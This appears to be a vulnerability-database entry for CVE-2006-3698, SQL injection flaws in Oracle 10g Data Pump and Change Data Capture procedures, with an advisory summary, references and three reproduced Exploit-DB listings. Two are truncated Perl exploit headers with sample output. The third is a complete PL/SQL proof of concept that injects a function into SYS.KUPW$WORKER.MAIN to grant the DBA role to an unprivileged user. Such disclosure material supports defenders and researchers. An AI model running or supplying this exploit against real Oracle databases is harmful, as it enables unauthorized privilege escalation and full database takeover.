CVE-2006-3698
published 2006-07-21CVE-2006-3698: Multiple unspecified vulnerabilities in Oracle Database 10.1.0.5 have unknown impact and attack vectors, aka Oracle Vuln# (1) DB01 for Change Data Capture…
critical10CVSS 3.1
AVNACLAuNCCICAC
EXPLOIT
Multiple unspecified vulnerabilities in Oracle Database 10.1.0.5 have unknown impact and attack vectors, aka Oracle Vuln# (1) DB01 for Change Data Capture (CDC) component and (2) DB03 for Data Pump Metadata API. NOTE: as of 20060719, Oracle has not disputed a claim by a reliable researcher that DB01 is related to multiple SQL injection vulnerabilities in SYS.DBMS_CDC_IMPDP using the (a) IMPORT_CHANGE_SET, (b) IMPORT_CHANGE_TABLE, (c) IMPORT_CHANGE_COLUMN, (d) IMPORT_SUBSCRIBER, (e) IMPORT_SUBSCRIBED_TABLE, (f) IMPORT_SUBSCRIBED_COLUMN, (g) VALIDATE_IMPORT, (h) VALIDATE_CHANGE_SET, (i) VALIDATE_CHANGE_TABLE, and (j) VALIDATE_SUBSCRIPTION procedures, and that DB03 is for SQL injection in the MAIN procedure for SYS.KUPW$WORKER.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | database_server | — | — |
No detection rules found.
Exploit-DB
Oracle 10g - KUPW$WORKER.MAIN SQL Injection (2)
exploitdb·2007-02-26
CVE-2006-3698 Oracle 10g - KUPW$WORKER.MAIN SQL Injection (2)
Oracle 10g - KUPW$WORKER.MAIN SQL Injection (2)
---
#!/usr/bin/perl
#
# Remote Oracle KUPW$WORKER.MAIN exploit (10g)
# - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privileg needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
#
# REF: http://www.securityfocus.com/archive/1/440439
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Thu Feb 26 17:48:27 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
#
# bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# DBD::Oracle::db
Exploit-DB
Oracle 10g - KUPW$WORKER.MAIN Grant/Revoke dba Permission
exploitdb·2007-02-22
CVE-2006-3698 Oracle 10g - KUPW$WORKER.MAIN Grant/Revoke dba Permission
Oracle 10g - KUPW$WORKER.MAIN Grant/Revoke dba Permission
---
#!/usr/bin/perl
#
# Remote Oracle KUPW$WORKER.MAIN exploit (10g)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
#
# REF: http://www.securityfocus.com/archive/1/440439
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Thu Feb 22 17:48:27 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
#
# bunker@fin:~$ perl kupw-worker.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupw-worker.pl line 94.
# [
Exploit-DB
Oracle 10g - SYS.KUPW$WORKER.MAIN PL / SQL Injection
exploitdb·2007-01-23
CVE-2006-3698 Oracle 10g - SYS.KUPW$WORKER.MAIN PL / SQL Injection
Oracle 10g - SYS.KUPW$WORKER.MAIN PL / SQL Injection
---
/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret
* Privileges needed:
*
* - CREATE SESSION
* - CREATE PROCEDURE
*
*/
select *
from user_role_privs
;
CREATE OR REPLACE FUNCTION F1
RETURN NUMBER AUTHID CURRENT_USER
IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
COMMIT;
RETURN(1);
END;
/
DECLARE
MASTER_NAME VARCHAR2(200);
MASTER_OWNER VARCHAR2(200);
BEGIN
MASTER_NAME := ''' or ' || user || '.f1=1--';
MASTER_OWNER := 'bla';
SYS.KUPW$WORKER.MAIN(
MASTER_NAME => MASTER_NAME,
MASTER_OWNER => MASTER_OWNER
);
END;
/
select *
from user_role_privs
;
// milw0rm.com [2007-01-23]
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2006-July/047994.htmlhttp://secunia.com/advisories/21111http://secunia.com/advisories/21165http://securitytracker.com/id?1016529http://www.oracle.com/technetwork/topics/security/cpujul2006-101315.htmlhttp://www.red-database-security.com/advisory/oracle_cpu_july_2006.htmlhttp://www.red-database-security.com/advisory/oracle_sql_injection_dbms_cdc_impdp.htmlhttp://www.red-database-security.com/advisory/oracle_sql_injection_kupw%24worker.htmlhttp://www.securityfocus.com/archive/1/440439/100/0/threadedhttp://www.securityfocus.com/archive/1/440440/100/0/threadedhttp://www.securityfocus.com/archive/1/440758/100/100/threadedhttp://www.securityfocus.com/bid/19054http://www.us-cert.gov/cas/techalerts/TA06-200A.htmlhttp://www.vupen.com/english/advisories/2006/2863http://www.vupen.com/english/advisories/2006/2947https://exchange.xforce.ibmcloud.com/vulnerabilities/27888https://exchange.xforce.ibmcloud.com/vulnerabilities/27889https://exchange.xforce.ibmcloud.com/vulnerabilities/27897http://lists.grok.org.uk/pipermail/full-disclosure/2006-July/047994.htmlhttp://secunia.com/advisories/21111http://secunia.com/advisories/21165http://securitytracker.com/id?1016529http://www.oracle.com/technetwork/topics/security/cpujul2006-101315.htmlhttp://www.red-database-security.com/advisory/oracle_cpu_july_2006.htmlhttp://www.red-database-security.com/advisory/oracle_sql_injection_dbms_cdc_impdp.htmlhttp://www.red-database-security.com/advisory/oracle_sql_injection_kupw%24worker.htmlhttp://www.securityfocus.com/archive/1/440439/100/0/threadedhttp://www.securityfocus.com/archive/1/440440/100/0/threadedhttp://www.securityfocus.com/archive/1/440758/100/100/threadedhttp://www.securityfocus.com/bid/19054http://www.us-cert.gov/cas/techalerts/TA06-200A.htmlhttp://www.vupen.com/english/advisories/2006/2863http://www.vupen.com/english/advisories/2006/2947https://exchange.xforce.ibmcloud.com/vulnerabilities/27888https://exchange.xforce.ibmcloud.com/vulnerabilities/27889https://exchange.xforce.ibmcloud.com/vulnerabilities/27897
2006-07-21
Published